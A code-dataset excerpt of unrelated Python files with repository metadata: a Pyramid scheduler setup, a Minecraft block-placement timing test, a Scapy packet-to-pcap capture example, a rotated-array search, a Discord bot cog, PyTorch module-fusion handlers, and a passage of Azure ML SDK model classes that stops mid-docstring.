        sync_design(db)
    config.registry.db = db
    jobstores = {
        #'default': CouchDBJobStore(database=db_name, client=server)
    }
    #executors = {
    #'default': ThreadPoolExecutor(5),
    #'processpool': ProcessPoolExecutor(5)
    #}
    job_defaults = {
        'coalesce': False,
        'max_instances': 3
    }
    config.registry.api_url = settings.get('api.url')
    config.registry.callback_url = settings.get('callback.url')
    scheduler = Scheduler(jobstores=jobstores,
                          #executors=executors,
                          job_defaults=job_defaults,
                          timezone=TZ)
    if 'jobstore_db' in settings:
        scheduler.add_jobstore('sqlalchemy', url=settings['jobstore_db'])
    config.registry.scheduler = scheduler
    # scheduler.remove_all_jobs()
    # scheduler.start()
    # Schedule an initial "resync_all" push unless a fresh job already exists
    # (one whose next run is less than an hour overdue).
    resync_all_job = scheduler.get_job('resync_all')
    now = datetime.now(TZ)
    if not resync_all_job or resync_all_job.next_run_time < now - timedelta(hours=1):
        if resync_all_job:
            args = resync_all_job.args
        else:
            args = [settings.get('callback.url') + 'resync_all', None]
        run_date = now + timedelta(seconds=60)
        scheduler.add_job(push, 'date', run_date=run_date, timezone=TZ,
                          id='resync_all', args=args,
                          replace_existing=True, misfire_grace_time=60 * 60)
    return config.make_wsgi_app()
| 44.124138
| 215
| 0.664739
| 754
| 6,398
| 5.437666
| 0.248011
| 0.016098
| 0.027317
| 0.019512
| 0.194634
| 0.091707
| 0.020488
| 0
| 0
| 0
| 0
| 0.004944
| 0.209597
| 6,398
| 144
| 216
| 44.430556
| 0.805814
| 0.069553
| 0
| 0.065574
| 0
| 0.008197
| 0.22679
| 0.033698
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016393
| false
| 0.02459
| 0.114754
| 0
| 0.139344
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a30f4fc2ab1f50558de3a730d24cdd2bc794f650
| 1,078
|
py
|
Python
|
poc/setmanyblocks.py
|
astro-pi/SpaceCRAFT
|
b577681b31c0554db9e77ed816cd63900fe195ca
|
[
"BSD-3-Clause"
] | 12
|
2016-03-05T16:40:16.000Z
|
2019-10-27T07:48:12.000Z
|
poc/setmanyblocks.py
|
astro-pi/SpaceCRAFT
|
b577681b31c0554db9e77ed816cd63900fe195ca
|
[
"BSD-3-Clause"
] | 1
|
2016-03-03T16:54:59.000Z
|
2016-03-09T12:14:33.000Z
|
poc/setmanyblocks.py
|
astro-pi/SpaceCRAFT
|
b577681b31c0554db9e77ed816cd63900fe195ca
|
[
"BSD-3-Clause"
] | 2
|
2015-12-01T08:01:07.000Z
|
2019-10-27T07:48:19.000Z
|
#code which sends many setBlock commands all in one go, to see if there was
# a performance improvement.. It sent them a lot quicker, but you still had to wait
# for minecraft to catch up
import mcpi.minecraft as minecraft
import mcpi.block as block
import mcpi.util as util
from time import time, sleep
def setManyBlocks(mc, blocks):
mc.conn.drain()
s = ""
for block in blocks:
args = minecraft.intFloor(block)
s += "world.setBlock(%s)\n"%(util.flatten_parameters_to_string(args))
mc.conn.lastSent = s
mc.conn.socket.sendall(s.encode())
mc = minecraft.Minecraft.create()
starttime = time()
blocksToSet = []
for x in range(0,25):
for y in range(25,50):
for z in range(0,25):
blocksToSet.append((x,y,z,block.DIAMOND_BLOCK.id))
endtime = time()
print(endtime - starttime)
setManyBlocks(mc, blocksToSet)
sleep(5)
starttime = time()
for x in range(0,25):
for y in range(25,50):
for z in range(0,25):
mc.setBlock(x,y,z,block.DIRT.id)
endtime = time()
print(endtime - starttime)
| 25.069767
| 83
| 0.666976
| 169
| 1,078
| 4.230769
| 0.443787
| 0.058741
| 0.044755
| 0.055944
| 0.215385
| 0.215385
| 0.12028
| 0.12028
| 0.12028
| 0.12028
| 0
| 0.024852
| 0.216141
| 1,078
| 42
| 84
| 25.666667
| 0.821302
| 0.168831
| 0
| 0.4
| 0
| 0
| 0.022422
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033333
| false
| 0
| 0.133333
| 0
| 0.166667
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3156184194412b6c58e7f98504a56f1d8eea1bf
| 1,132
|
py
|
Python
|
Chapter08/8_2_save_packets_in_pcap_format.py
|
shamir456/Python-Network-Programming-Cookbook-Second-Edition
|
7f5ebcbb4ef79c41da677afdf0d8e0fb575dcf0b
|
[
"MIT"
] | 125
|
2017-08-10T18:09:55.000Z
|
2022-03-29T10:14:31.000Z
|
Chapter08/8_2_save_packets_in_pcap_format.py
|
shamir456/Python-Network-Programming-Cookbook-Second-Edition
|
7f5ebcbb4ef79c41da677afdf0d8e0fb575dcf0b
|
[
"MIT"
] | 4
|
2018-01-19T05:42:58.000Z
|
2019-03-07T06:18:52.000Z
|
Chapter08/8_2_save_packets_in_pcap_format.py
|
shamir456/Python-Network-Programming-Cookbook-Second-Edition
|
7f5ebcbb4ef79c41da677afdf0d8e0fb575dcf0b
|
[
"MIT"
] | 79
|
2017-08-15T00:40:36.000Z
|
2022-02-26T10:20:24.000Z
|
#!/usr/bin/env python
# Python Network Programming Cookbook, Second Edition -- Chapter - 8
# This program is optimized for Python 2.7.12 and Python 3.5.2.
# It may run on any other version with/without modifications.
import os
from scapy.all import *
# Module-level capture state shared with write_cap():
pkts = []     # packets buffered since the last flush
count = 0     # number of packets currently in `pkts`
pcapnum = 0   # index of the last pcap file written
def write_cap(x):
    """Buffer sniffed packets and flush every 3 of them to a new pcap file.

    Files are written as pcap1.pcap, pcap2.pcap, ... in the working
    directory.  State lives in the module-level pkts/count/pcapnum globals.
    """
    global pkts, count, pcapnum
    pkts.append(x)
    count += 1
    if count == 3:
        # Buffer full: dump it to the next numbered capture file and reset.
        pcapnum += 1
        wrpcap("pcap%d.pcap" % pcapnum, pkts)
        pkts = []
        count = 0
def test_dump_file():
    """Read back ./pcap1.pcap and hex-dump its first three packets.

    Prints a notice instead when the capture file does not exist.
    """
    print ("Testing the dump file...")
    dump_file = "./pcap1.pcap"
    if os.path.exists(dump_file):
        # Fixed typo in user-facing messages: "dump fie" -> "dump file".
        print ("dump file %s found." %dump_file)
        pkts = sniff(offline=dump_file)
        count = 0
        while (count <=2):
            print ("----Dumping pkt:%s----" %count)
            print (hexdump(pkts[count]))
            count += 1
    else:
        print ("dump file %s not found." %dump_file)
if __name__ == '__main__':
    # Capture packets until interrupted, writing them out in groups of 3,
    # then verify the first dump file can be read back.
    print ("Started packet capturing and dumping... Press CTRL+C to exit")
    sniff(prn=write_cap)
    test_dump_file()
| 24.085106
| 74
| 0.590106
| 155
| 1,132
| 4.187097
| 0.541935
| 0.098613
| 0.030817
| 0.040062
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.022305
| 0.287102
| 1,132
| 46
| 75
| 24.608696
| 0.781908
| 0.184629
| 0
| 0.205882
| 0
| 0
| 0.19281
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.058824
| 0
| 0.117647
| 0.176471
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a3168c69f4eb9f2ba122306fee2a6890c6f1230e
| 1,621
|
py
|
Python
|
Assignments/Sprint2/FinValuePivot.py
|
mark-morelos/CS_Notes
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
[
"MIT"
] | 1
|
2021-02-28T07:43:59.000Z
|
2021-02-28T07:43:59.000Z
|
Assignments/Sprint2/FinValuePivot.py
|
mark-morelos/CS_Notes
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
[
"MIT"
] | null | null | null |
Assignments/Sprint2/FinValuePivot.py
|
mark-morelos/CS_Notes
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
[
"MIT"
] | 1
|
2021-03-03T03:52:21.000Z
|
2021-03-03T03:52:21.000Z
|
"""
You are given a sorted array in ascending order that is rotated at some unknown pivot
(i.e., [0,1,2,4,5,6,7] might become [4,5,6,7,0,1,2]) and a target value.
Write a function that returns the target value's index. If the target value is not present
in the array, return -1.
You may assume no duplicate exists in the array.
Your algorithm's runtime complexity must be in the order of O(log n).
Example 1:
Input: nums = [4,5,6,7,0,1,2], target = 0
Output: 4
Example 2:
Input: nums = [4,5,6,7,0,1,2], target = 3
Output: -1
"""
def findValueSortedShiftedArray(nums, target):
    """Search ``target`` in an ascending array rotated at an unknown pivot.

    Locates the pivot first, then binary-searches the half that can contain
    ``target``.  Returns the index of ``target`` or -1 when absent.
    """
    n = len(nums)
    pivot = findPivot(nums, 0, n - 1)
    if pivot == -1:
        # Not rotated: plain binary search over the whole array.
        lo, hi = 0, n - 1
    elif nums[pivot] == target:
        return pivot
    elif nums[0] <= target:
        # Values >= nums[0] live in the left (pre-pivot) segment.
        lo, hi = 0, pivot - 1
    else:
        lo, hi = pivot + 1, n - 1
    return binarySearch(nums, lo, hi, target)
def findPivot(nums, min, max):
    """Return the index of the largest element (the rotation point) in
    nums[min:max+1], assuming an ascending array rotated at some pivot.

    Returns -1 for an empty range.  For a fully sorted sub-range the
    recursion bottoms out on the last index, which the caller handles
    correctly.

    Fixes over the previous version:
    * the ``min``/``max`` arguments are no longer clobbered with
      ``0, len(nums)``, which made every recursive call restart from
      scratch and recurse forever on some inputs;
    * the ``nums[min] >= nums[mid]`` case now searches the LEFT half
      (where the drop actually is), and the missing final branch (pivot
      in the right half) no longer falls through returning None.
    """
    if max < min:
        return -1
    if max == min:
        return min
    mid = int((min + max) / 2)
    # Pivot exactly at mid (drop right after it)?
    if mid < max and nums[mid] > nums[mid + 1]:
        return mid
    # Pivot right before mid?
    if mid > min and nums[mid] < nums[mid - 1]:
        return (mid - 1)
    if nums[min] >= nums[mid]:
        # Left edge >= middle: the drop is in the left half.
        return findPivot(nums, min, mid - 1)
    # Left half is sorted, so the pivot must be to the right.
    return findPivot(nums, mid + 1, max)
def binarySearch(nums, min, max, target):
    """Standard binary search for ``target`` within nums[min:max+1].

    The range must be sorted in ascending order.  Returns the index of
    ``target`` or -1 when it is absent.
    """
    # Iterative form of the usual halving search.
    while min <= max:
        mid = int((min + max) / 2)
        if nums[mid] == target:
            return mid
        if target > nums[mid]:
            min = mid + 1
        else:
            max = mid - 1
    return -1
| 25.730159
| 91
| 0.58359
| 258
| 1,621
| 3.666667
| 0.267442
| 0.066596
| 0.116279
| 0.016913
| 0.216702
| 0.142706
| 0.110994
| 0.103594
| 0.046512
| 0.046512
| 0
| 0.047743
| 0.289328
| 1,621
| 63
| 92
| 25.730159
| 0.773438
| 0.319556
| 0
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09375
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a31d402b111d9ee652386e79f628f7e0ddffa959
| 987
|
py
|
Python
|
utility.py
|
Forthyse/Forsythe-Bot
|
c8871b1fde456403d951a9dde13dddaca2d3f67b
|
[
"MIT"
] | 3
|
2021-01-18T22:10:05.000Z
|
2022-01-07T21:46:34.000Z
|
utility.py
|
Forthyse/Forsythe-Bot
|
c8871b1fde456403d951a9dde13dddaca2d3f67b
|
[
"MIT"
] | null | null | null |
utility.py
|
Forthyse/Forsythe-Bot
|
c8871b1fde456403d951a9dde13dddaca2d3f67b
|
[
"MIT"
] | 2
|
2020-10-21T01:27:34.000Z
|
2021-01-02T23:51:02.000Z
|
import discord
from discord.ext import commands
class utility(commands.Cog):
    """Utility commands cog: avatar lookup and latency check."""

    def __init__(self, client):
        # Bot instance; kept for websocket latency access in ping().
        self.client = client

    @commands.guild_only()
    @commands.command(name = "avatar", aliases = ["av", "pic"])
    async def avatar(self, ctx, user: discord.User=None):
        """Send an embed showing the avatar of ``user`` (caller by default)."""
        if user is None:
            user = ctx.author
        embed = discord.Embed(color=000000, title=f'{user.name}#{user.discriminator}')
        embed.set_image(url=user.avatar_url)
        await ctx.send(embed=embed)

    @commands.guild_only()
    @commands.command(name="ping")
    @commands.cooldown(2, 3, commands.BucketType.user)
    async def ping(self, ctx):
        """Report message round-trip latency and websocket latency in ms."""
        pinging = await ctx.send('Pinging...')
        # Round-trip estimate: our reply's timestamp minus the command's.
        diff = pinging.created_at - ctx.message.created_at
        await pinging.edit(content=f'Pong! Latency: {round(diff.total_seconds()*1000)}ms | Websocket: {round(self.client.latency*1000)}ms')
def setup(client):
    """Extension entry point used by discord.py's ``load_extension``."""
    cog = utility(client)
    client.add_cog(cog)
| 37.961538
| 140
| 0.64843
| 127
| 987
| 4.944882
| 0.472441
| 0.047771
| 0.05414
| 0.079618
| 0.11465
| 0.11465
| 0
| 0
| 0
| 0
| 0
| 0.020592
| 0.212766
| 987
| 26
| 141
| 37.961538
| 0.787645
| 0
| 0
| 0.090909
| 0
| 0.045455
| 0.163032
| 0.106957
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.090909
| 0
| 0.227273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a31f5b674099dd26d6054dab2dbff6ca679ee640
| 8,215
|
py
|
Python
|
torch/ao/quantization/fx/fusion_patterns.py
|
li-ang/pytorch
|
17f3179d607b9a2eac5efdfc36673e89f70e6628
|
[
"Intel"
] | 1
|
2022-02-15T07:07:31.000Z
|
2022-02-15T07:07:31.000Z
|
torch/ao/quantization/fx/fusion_patterns.py
|
xiaozhoushi/pytorch
|
7dba88dfdb414def252531027658afe60409291d
|
[
"Intel"
] | null | null | null |
torch/ao/quantization/fx/fusion_patterns.py
|
xiaozhoushi/pytorch
|
7dba88dfdb414def252531027658afe60409291d
|
[
"Intel"
] | null | null | null |
import torch
from torch.fx.graph import Node
from .pattern_utils import (
register_fusion_pattern,
)
from .utils import _parent_name
from .quantization_types import QuantizerCls, NodePattern, Pattern
from ..fuser_method_mappings import get_fuser_method
from ..fuser_method_mappings import get_fuser_method_new
from abc import ABC, abstractmethod
from typing import Any, Callable, Dict, Optional, Union
from .match_utils import MatchAllNode
# ----------------------------
# Fusion Pattern Registrations
# ----------------------------
# Base Pattern Handler
class FuseHandler(ABC):
    """ Base handler class for the fusion patterns
    """
    def __init__(self, quantizer: QuantizerCls, node: Node):
        pass

    @abstractmethod
    def fuse(self,
             quantizer: QuantizerCls,
             load_arg: Callable,
             root_node: Node,
             matched_node_pattern: NodePattern,
             fuse_custom_config_dict: Dict[str, Any],
             fuser_method_mapping: Optional[Dict[Pattern, Union[torch.nn.Sequential, Callable]]]) -> Node:
        """Fuse the matched pattern rooted at ``root_node`` and return the
        node copied into the fused graph."""
        pass
@register_fusion_pattern((torch.nn.ReLU, torch.nn.Conv1d))
@register_fusion_pattern((torch.nn.ReLU, torch.nn.Conv2d))
@register_fusion_pattern((torch.nn.ReLU, torch.nn.Conv3d))
@register_fusion_pattern((torch.nn.functional.relu, torch.nn.Conv1d))
@register_fusion_pattern((torch.nn.functional.relu, torch.nn.Conv2d))
@register_fusion_pattern((torch.nn.functional.relu, torch.nn.Conv3d))
@register_fusion_pattern((torch.nn.BatchNorm1d, torch.nn.Conv1d))
@register_fusion_pattern((torch.nn.BatchNorm2d, torch.nn.Conv2d))
@register_fusion_pattern((torch.nn.BatchNorm3d, torch.nn.Conv3d))
@register_fusion_pattern((torch.nn.ReLU, (torch.nn.BatchNorm1d, torch.nn.Conv1d)))
@register_fusion_pattern((torch.nn.ReLU, (torch.nn.BatchNorm2d, torch.nn.Conv2d)))
@register_fusion_pattern((torch.nn.ReLU, (torch.nn.BatchNorm3d, torch.nn.Conv3d)))
@register_fusion_pattern((torch.nn.functional.relu, (torch.nn.BatchNorm1d, torch.nn.Conv1d)))
@register_fusion_pattern((torch.nn.functional.relu, (torch.nn.BatchNorm2d, torch.nn.Conv2d)))
@register_fusion_pattern((torch.nn.functional.relu, (torch.nn.BatchNorm3d, torch.nn.Conv3d)))
@register_fusion_pattern((torch.nn.BatchNorm1d, torch.nn.Linear))
class ConvOrLinearBNReLUFusion(FuseHandler):
    """Fuses conv/linear (+ optional BatchNorm) (+ optional ReLU) chains
    into a single fused module.
    """

    def __init__(self, quantizer: QuantizerCls, node: Node):
        super().__init__(quantizer, node)
        self.relu_node = None
        self.bn_node = None
        # ``node`` is the last op of the matched pattern; walk backwards
        # through an optional relu and an optional batchnorm down to the
        # conv/linear at the root of the chain.
        if (node.op == 'call_function' and node.target is torch.nn.functional.relu) or \
           (node.op == 'call_module' and type(quantizer.modules[node.target]) == torch.nn.ReLU):
            self.relu_node = node
            assert isinstance(node.args[0], Node)
            node = node.args[0]
        assert node.op == 'call_module'
        if type(quantizer.modules[node.target]) in [torch.nn.BatchNorm1d, torch.nn.BatchNorm2d, torch.nn.BatchNorm3d]:
            self.bn_node = node
            self.bn = quantizer.modules[self.bn_node.target]
            assert isinstance(node.args[0], Node)
            node = node.args[0]
        assert node.op == 'call_module'
        self.conv_or_linear_node = node
        self.conv_or_linear = quantizer.modules[self.conv_or_linear_node.target]

    def fuse(self,
             quantizer: QuantizerCls,
             load_arg: Callable,
             root_node: Node,
             matched_node_pattern: NodePattern,
             fuse_custom_config_dict: Dict[str, Any],
             fuser_method_mapping: Optional[Dict[Pattern, Union[torch.nn.Sequential, Callable]]]) -> Node:
        """Build [conv_or_linear, bn?, relu?], fuse via the mapped fuser
        method, install the fused module, and copy the node into the fused
        graph.  Raises NotImplementedError when no fuser method exists for
        the matched module types.
        """
        additional_fuser_method_mapping = fuse_custom_config_dict.get("additional_fuser_method_mapping", {})
        op_list = []
        if self.relu_node is not None:
            # since relu can be used multiple times, we'll need to create a relu module for each match
            if self.relu_node.op == 'call_module':
                relu = torch.nn.ReLU(quantizer.modules[self.relu_node.target].inplace)
            else:
                # TODO: get inplace argument from functional
                relu = torch.nn.ReLU()
            op_list.append(relu)
            relu.training = self.conv_or_linear.training
            if self.bn_node is not None:
                op_list.append(self.bn)
            op_list.append(self.conv_or_linear)
        else:
            assert self.bn_node is not None
            op_list.append(self.bn)
            op_list.append(self.conv_or_linear)

        # the modules are added in order of relu - bn - conv_or_linear
        # so we need to correct it
        op_list.reverse()
        op_type_list = tuple(type(m) for m in op_list)
        conv_or_linear_parent_name, conv_or_linear_name = _parent_name(self.conv_or_linear_node.target)
        fuser_method = get_fuser_method(op_type_list, additional_fuser_method_mapping)
        if fuser_method is None:
            raise NotImplementedError("Cannot fuse modules: {}".format(op_type_list))
        fused = fuser_method(*op_list)
        setattr(quantizer.modules[conv_or_linear_parent_name], conv_or_linear_name, fused)

        # TODO: do we need to make sure bn is only used once?
        if self.bn_node is not None:
            parent_name, name = _parent_name(self.bn_node.target)
            # Replace the standalone batchnorm with a no-op; its effect now
            # lives inside the fused module.
            setattr(quantizer.modules[parent_name], name, torch.nn.Identity())
        # relu may be used multiple times, so we don't set relu to identity
        return quantizer.fused_graph.node_copy(self.conv_or_linear_node, load_arg)
@register_fusion_pattern((torch.nn.functional.relu, torch.nn.Linear))
@register_fusion_pattern((torch.nn.ReLU, torch.nn.Linear))
@register_fusion_pattern((torch.nn.functional.relu, torch.nn.BatchNorm2d))
@register_fusion_pattern((torch.nn.ReLU, torch.nn.BatchNorm2d))
@register_fusion_pattern((torch.nn.functional.relu, torch.nn.BatchNorm3d))
@register_fusion_pattern((torch.nn.ReLU, torch.nn.BatchNorm3d))
class ModuleReLUFusion(FuseHandler):
    """Fuses (module, ReLU) patterns such as Linear+ReLU and BatchNorm+ReLU."""

    def __init__(
            self,
            quantizer: QuantizerCls,
            node: Node):
        super().__init__(quantizer, node)
        # ``node`` is the relu; its first argument is the module to fuse with.
        self.relu_node = node
        assert isinstance(node.args[0], Node)
        node = node.args[0]
        assert node.op == 'call_module'
        self.module_node = node
        self.module = quantizer.modules[self.module_node.target]

    def fuse(self, quantizer: QuantizerCls,
             load_arg: Callable,
             root_node: Node,
             matched_node_pattern: NodePattern,
             fuse_custom_config_dict: Dict[str, Any],
             fuser_method_mapping: Optional[Dict[Pattern, Union[torch.nn.Sequential, Callable]]]) -> Node:
        """Replace the matched module sequence with its fused module and copy
        the root node into the fused graph.

        Raises AssertionError when additional_fuser_method_mapping is given,
        since that extension point is not supported by this implementation.
        """
        additional_fuser_method_mapping = fuse_custom_config_dict.get("additional_fuser_method_mapping", {})
        assert root_node.op == "call_module", "Expecting module node to be a call_module Node"
        root_module = quantizer.modules[root_node.target]
        # BUG FIX: the assertion message used to be split across two
        # statements, so its second half was a dead-code string literal and
        # never appeared in the raised AssertionError.
        assert len(additional_fuser_method_mapping) == 0, (
            "Fusion implementation is undergoing changes, "
            "additional_fuser_method_mapping is not supported currently.")

        def get_module(n):
            # Map a matched graph node to the concrete module to fuse.
            if n.op == "call_module":
                return quantizer.modules[n.target]
            elif n.op == "call_function" and n.target == torch.nn.functional.relu:
                # since relu can be used multiple times, we'll need to create a relu module for each match
                relu = torch.nn.ReLU()
                relu.training = root_module.training
                return relu
            return MatchAllNode

        matched_modules = tuple(map(get_module, matched_node_pattern))

        def get_type(m):
            return type(m)

        matched_module_types = tuple(map(get_type, matched_modules))
        module_parent_name, module_name = _parent_name(root_node.target)
        fuser_method = get_fuser_method_new(matched_module_types, fuser_method_mapping)
        # TODO: change the signature for fuser_method to take matched module patterns
        # as input
        fused_module = fuser_method(*matched_modules)
        setattr(quantizer.modules[module_parent_name], module_name, fused_module)
        return quantizer.fused_graph.node_copy(root_node, load_arg)
| 48.89881
| 118
| 0.684967
| 1,064
| 8,215
| 5.040414
| 0.142857
| 0.08223
| 0.090062
| 0.106657
| 0.602834
| 0.576916
| 0.546336
| 0.521536
| 0.50028
| 0.44807
| 0
| 0.006008
| 0.20986
| 8,215
| 167
| 119
| 49.191617
| 0.820213
| 0.081071
| 0
| 0.35
| 0
| 0
| 0.044887
| 0.012351
| 0
| 0
| 0
| 0.005988
| 0.064286
| 1
| 0.057143
| false
| 0.014286
| 0.071429
| 0.007143
| 0.192857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a323da1e6144f951fab0d4c366a9e8d27bf93ca5
| 46,478
|
py
|
Python
|
sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/v2020_09_01_dataplanepreview/models/_models.py
|
dubiety/azure-sdk-for-python
|
62ffa839f5d753594cf0fe63668f454a9d87a346
|
[
"MIT"
] | 1
|
2022-02-01T18:50:12.000Z
|
2022-02-01T18:50:12.000Z
|
sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/v2020_09_01_dataplanepreview/models/_models.py
|
ellhe-blaster/azure-sdk-for-python
|
82193ba5e81cc5e5e5a5239bba58abe62e86f469
|
[
"MIT"
] | null | null | null |
sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/v2020_09_01_dataplanepreview/models/_models.py
|
ellhe-blaster/azure-sdk-for-python
|
82193ba5e81cc5e5e5a5239bba58abe62e86f469
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class AssetJobInput(msrest.serialization.Model):
    """Asset input type.

    All required parameters must be populated in order to send to Azure.

    :ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
     "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
    :vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
    :ivar uri: Required. Input Asset URI.
    :vartype uri: str
    """

    # Client-side validation rules applied by msrest before serialization.
    _validation = {
        'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
    }

    # Maps Python attribute names to wire-format keys and types.
    _attribute_map = {
        'mode': {'key': 'mode', 'type': 'str'},
        'uri': {'key': 'uri', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
         "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
        :paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
        :keyword uri: Required. Input Asset URI.
        :paramtype uri: str
        """
        super(AssetJobInput, self).__init__(**kwargs)
        self.mode = kwargs.get('mode', None)
        # 'uri' is required: a KeyError here means the caller omitted it.
        self.uri = kwargs['uri']
class AssetJobOutput(msrest.serialization.Model):
    """Asset output type.

    :ivar mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
    :vartype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
    :ivar uri: Output Asset URI. This will have a default value of
     "azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
    :vartype uri: str
    """

    # Maps Python attribute names to wire-format keys and types.
    _attribute_map = {
        'mode': {'key': 'mode', 'type': 'str'},
        'uri': {'key': 'uri', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
        :paramtype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
        :keyword uri: Output Asset URI. This will have a default value of
         "azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
        :paramtype uri: str
        """
        super(AssetJobOutput, self).__init__(**kwargs)
        # Both fields are optional; the service applies defaults server-side.
        self.mode = kwargs.get('mode', None)
        self.uri = kwargs.get('uri', None)
class BatchJob(msrest.serialization.Model):
    """Batch endpoint job.
    Variables are only populated by the server, and will be ignored when sending a request.
    :ivar compute: Compute configuration used to set instance count.
    :vartype compute: ~azure.mgmt.machinelearningservices.models.ComputeConfiguration
    :ivar dataset: Input dataset
     This will be deprecated. Use InputData instead.
    :vartype dataset: ~azure.mgmt.machinelearningservices.models.InferenceDataInputBase
    :ivar description: The asset description text.
    :vartype description: str
    :ivar error_threshold: Error threshold, if the error count for the entire input goes above this
     value,
     the batch inference will be aborted. Range is [-1, int.MaxValue]
     -1 value indicates, ignore all failures during batch inference.
    :vartype error_threshold: int
    :ivar input_data: Input data for the job.
    :vartype input_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobInput]
    :ivar interaction_endpoints: Dictionary of endpoint URIs, keyed by enumerated job endpoints.
    :vartype interaction_endpoints: dict[str,
     ~azure.mgmt.machinelearningservices.models.JobEndpoint]
    :ivar logging_level: Logging level for batch inference operation. Possible values include:
     "Info", "Warning", "Debug".
    :vartype logging_level: str or ~azure.mgmt.machinelearningservices.models.BatchLoggingLevel
    :ivar max_concurrency_per_instance: Indicates maximum number of parallelism per instance.
    :vartype max_concurrency_per_instance: int
    :ivar mini_batch_size: Size of the mini-batch passed to each batch invocation.
     For FileDataset, this is the number of files per mini-batch.
     For TabularDataset, this is the size of the records in bytes, per mini-batch.
    :vartype mini_batch_size: long
    :ivar name:
    :vartype name: str
    :ivar output: Location of the job output logs and artifacts.
    :vartype output: ~azure.mgmt.machinelearningservices.models.JobOutputArtifacts
    :ivar output_data: Job output data location
     Optional parameter: when not specified, the default location is
     workspaceblobstore location.
    :vartype output_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobOutputV2]
    :ivar output_dataset: Output dataset location
     Optional parameter: when not specified, the default location is
     workspaceblobstore location.
     This will be deprecated. Use OutputData instead.
    :vartype output_dataset: ~azure.mgmt.machinelearningservices.models.DataVersion
    :ivar output_file_name: Output file name.
    :vartype output_file_name: str
    :ivar partition_keys: Partition keys list used for Named partitioning.
    :vartype partition_keys: list[str]
    :ivar properties: The asset property dictionary.
    :vartype properties: dict[str, str]
    :ivar provisioning_state: Possible values include: "Succeeded", "Failed", "Canceled",
     "InProgress".
    :vartype provisioning_state: str or
     ~azure.mgmt.machinelearningservices.models.JobProvisioningState
    :ivar retry_settings: Retry Settings for the batch inference operation.
    :vartype retry_settings: ~azure.mgmt.machinelearningservices.models.BatchRetrySettings
    :ivar status: Status of the job. Possible values include: "NotStarted", "Starting",
     "Provisioning", "Preparing", "Queued", "Running", "Finalizing", "CancelRequested", "Completed",
     "Failed", "Canceled", "NotResponding", "Paused", "Unknown".
    :vartype status: str or ~azure.mgmt.machinelearningservices.models.JobStatus
